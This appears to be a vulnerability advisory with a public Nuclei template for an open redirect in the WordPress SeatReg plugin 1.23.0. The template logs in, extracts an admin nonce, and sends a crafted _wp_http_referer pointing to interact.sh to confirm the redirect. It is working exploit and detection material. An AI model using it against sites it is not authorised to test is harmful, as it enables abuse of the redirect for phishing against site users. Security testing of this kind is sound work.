seatreg-redirect: WordPress Plugin ‘SeatReg’ - Open Redirect

Date: 2025-08-01 | Affected software: WordPress Plugin SeatReg | PoC: public

Vulnerability description

WordPress SeatReg plugin version 1.23.0 suffers from an open redirection vulnerability.

PoC code [public]

id: seatreg-redirect

info:
  name: WordPress Plugin ‘SeatReg’ - Open Redirect
  author: Mariam Tariq
  severity: medium
  description: |
    WordPress SeatReg plugin version 1.23.0 suffers from an open redirection vulnerability.
  reference:
    - https://packetstormsecurity.com/files/167888/WordPress-SeatReg-1.23.0-Open-Redirect.html
  metadata:
    verified: true
    max-request: 3
  tags: redirect,packetstorm,seatreg,wp-plugin,wp,wordpress,authenticated,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
      - |
        GET /wp-admin/admin.php?page=seatreg-welcome HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /wp-admin/admin-post.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        new-registration-name=test&action=seatreg_create_submit&seatreg-admin-nonce={{seatreg-admin-nonce}}&_wp_http_referer=http://interact.sh&submit=Create+new+registration

    matchers:
      - type: dsl
        dsl:
          - status_code_3 == 302
          - contains(header_3, 'http://interact.sh')
        condition: and

    extractors:
      - type: regex
        name: seatreg-admin-nonce
        part: body
        group: 1
        regex:
          - '"seatreg\-admin\-nonce" value="([0-9a-z]+)"'
        internal: true
# digest: 490a004630440220415b511c3a3a92f7501ce0e8c989acc4468c0f7403f4bdd3cf048f083332a1a30220431457b9b557d16ea57e029ab8d1b6ab5e7edd577abfa95d749077a9eaf751f2:922c64590222798bb761d5b6d8e72950